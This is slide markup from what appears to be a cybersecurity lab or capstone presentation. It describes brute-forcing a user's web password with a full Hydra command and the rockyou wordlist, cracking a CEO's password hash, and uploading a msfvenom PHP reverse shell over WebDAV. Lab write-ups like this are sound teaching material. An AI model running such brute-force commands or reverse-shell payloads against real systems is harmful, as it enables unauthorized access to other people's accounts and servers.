                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABE200F4-B9EE-4DDB-9028-A6E9F5AD131F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400757" y="3155849"/>
            <a:ext cx="2322543" cy="709971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C90298D-6A47-4A33-9B40-B1D416DA43E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6434355" y="1864783"/>
            <a:ext cx="1542422" cy="896190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6E3D89C-41D1-4B1F-AD51-5F7B4DAFCCBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="57458" r="2116" b="26653"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400757" y="2679249"/>
            <a:ext cx="2495556" cy="47660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88"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1089" name="Google Shape;1089;p61"/>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dirty="0"/>
              <a:t>Exploitation: Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090;p61"/>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091" name="Google Shape;1091;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="31542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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2371500" cy="3154200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="18287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200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">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US" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> to Brute Force Ashton’s weak password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Cracker Station </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>on Ryan’s Hashed password</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">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endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1093" name="Google Shape;1093;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1094" name="Google Shape;1094;p61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC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01</a:t>
              </a:r>
              <a:endParaRPr sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1095" name="Google Shape;1095;p61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">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6" name="Google Shape;1096;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1097" name="Google Shape;1097;p61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC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1098" name="Google Shape;1098;p61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">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9" name="Google Shape;1099;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="31542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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3467550" y="1396499"/>
            <a:ext cx="2428500" cy="3337126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875"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1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I was able to discover Ashton’s weak password. Gain access to Capstone’s Directory folders. Found info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>mation on the how to access the WebDa and CEO Ryan’s hashed password. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1101" name="Google Shape;1101;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1102" name="Google Shape;1102;p61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC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03</a:t>
              </a:r>
              <a:endParaRPr sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1103" name="Google Shape;1103;p61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">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04" name="Google Shape;1104;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="32523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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6429675" y="1492980"/>
            <a:ext cx="2371500" cy="3252300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Screen shots of exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hydra -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> -P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/share/wordlists/rockyou.txt -s 80 -f 192.168.1.105 http-get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>http://192.168.1.105/company_</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>folder/secret_folder/</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5864EF75-D654-41FE-9AFE-173D37A87730}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6507722" y="3304079"/>
            <a:ext cx="2215405" cy="1123965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98802D5E-B975-4940-880F-83A11DABE821}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3524550" y="3223717"/>
            <a:ext cx="2249446" cy="103188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09"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110" name="Google Shape;1110;p62"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: [PHP Reverse Shell]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111" name="Google Shape;1111;p62"/>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112" name="Google Shape;1112;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="31542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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2371500" cy="3154200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Created a payload for a php reverse shell using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msvenom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfconsole, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>part of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Metasploit framework on the Kali machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Connected to the server using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, with instructions found during the brute force attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
